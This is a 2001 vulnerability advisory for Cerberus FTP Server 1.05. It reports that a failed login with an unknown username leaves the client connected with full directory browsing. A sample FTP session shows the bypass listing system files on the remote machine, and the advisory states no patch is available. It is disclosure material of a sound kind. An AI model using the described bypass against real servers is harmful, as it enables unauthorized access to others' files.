Andrisk Security Advisory 2# - Cerberus FTP Server 1.05 Topic: Cerberus FTP Server 1.05 Announced: 2001-04-25 Affects: Cerberus FTP Server 1.05 OS : Win9x/NT I. Problem Description ********************** Cerberus FTP Server 1.05 is an FTP server for Windows 9x/NT. A bug allows view any files from remote computer. II. Impact ************** When any user try to login with username that is not specified (or wrong) ftp server alowes : 1. Remote client stay conected 2 .Remote client can view all files and browse directories of the remote computer Example 1: -------- 220-Welcome to Cerberus FTP Server 220 Created by Grant Averett Name (IP:root): aaaaaaaaa 530 Unknown user ftp: Login failed. Remote system type is WindowsNT. ftp> ls 200 Port command received 150 Opening data connection d---rwxrwx 1 100 84 0 Apr 29 2001 !! ----rwxrwx 1 100 84 0 Nov 22 2000 AUTOEXEC.BAT -r--rwxrwx 1 100 84 289 Dec 25 2000 boot.ini -r--rwxrwx 1 100 84 36 Nov 22 2000 CONFIG.SYS -r--rwxrwx 1 100 84 4717 Jan 31 2001 ffastun.ffa -r--rwxrwx 1 100 84 2113536 Jan 31 2001 ffastun.ffl -r--rwxrwx 1 100 84 417792 Jan 31 2001 ffastun.ffo -r--rwxrwx 1 100 84 3620864 Jan 31 2001 ffastun0.ffx dr--rwxrwx 1 100 84 0 Apr 30 2001 ftproot -r--rwxrwx 1 100 84 0 Oct 01 2000 IO.SYS dr--rwxrwx 1 100 84 0 Apr 30 2001 mirc -r--rwxrwx 1 100 84 0 Oct 01 2000 MSDOS.SYS -r--rwxrwx 1 100 84 26816 Oct 01 2000 NTDETECT.COM -r--rwxrwx 1 100 84 156496 Oct 01 2000 ntldr -r--rwxrwx 1 100 84 579 Oct 28 2000 os240905.bin -r--rwxrwx 1 100 84 578 Nov 16 2000 os560179.bin -r--rwxrwx 1 100 84 163811328 Apr 27 2001 pagefile.sys dr--rwxrwx 1 100 84 0 Apr 29 2001 Program Files dr--rwxrwx 1 100 84 0 Apr 30 2001 rc5 dr--rwxrwx 1 100 84 0 Apr 19 2001 RECYCLER dr--rwxrwx 1 100 84 0 Apr 30 2001 TEMP dr--rwxrwx 1 100 84 0 Apr 29 2001 WINNT -r--rwxrwx 1 100 84 1375 Apr 29 2001 winzip.log 226 Transfer complete ftp> III. Solution ************* At this time, no patch is available yet. IV. Credits *********** Bug discovered by Andris K Greets: Mareks M, Dreef (www.lam.yo.lv), coolynx, ParaTr00p